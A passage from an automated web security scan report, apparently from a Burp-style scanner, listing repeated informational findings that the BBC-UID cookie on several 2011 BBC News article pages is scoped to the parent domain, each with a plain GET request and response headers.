The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12430115 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:13 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:13 GMT
Connection: close
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.72. http://www.bbc.co.uk/news/world-africa-12432292

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12432292

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12432292 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.73. http://www.bbc.co.uk/news/world-africa-12433674

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12433674

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12433674 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.74. http://www.bbc.co.uk/news/world-asia-pacific-12427423

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12427423

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-asia-pacific-12427423 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.75. http://www.bbc.co.uk/news/world-asia-pacific-12428385

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12428385

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-asia-pacific-12428385 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.76. http://www.bbc.co.uk/news/world-asia-pacific-12430671

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12430671

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-asia-pacific-12430671 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.77. http://www.bbc.co.uk/news/world-europe-12429539

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12429539

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-europe-12429539 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.78. http://www.bbc.co.uk/news/world-europe-12432879

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12432879

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-europe-12432879 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.79. http://www.bbc.co.uk/news/world-latin-america-12427051

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427051

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-latin-america-12427051 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.80. http://www.bbc.co.uk/news/world-latin-america-12427057

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427057

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-latin-america-12427057 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=732
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.81. http://www.bbc.co.uk/news/world-latin-america-12436213

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12436213

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-latin-america-12436213 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.82. http://www.bbc.co.uk/news/world-middle-east-12435798

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.83. http://www.bbc.co.uk/news/world-middle-east-12437440

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=749
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.84. http://www.bbc.co.uk/news/world-middle-east-12437881

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.85. http://www.bbc.co.uk/news/world-middle-east-12437912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.86. http://www.bbc.co.uk/news/world-middle-east-12437922

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.87. http://www.bbc.co.uk/news/world-south-asia-12427513

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.88. http://www.bbc.co.uk/news/world-south-asia-12427518

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
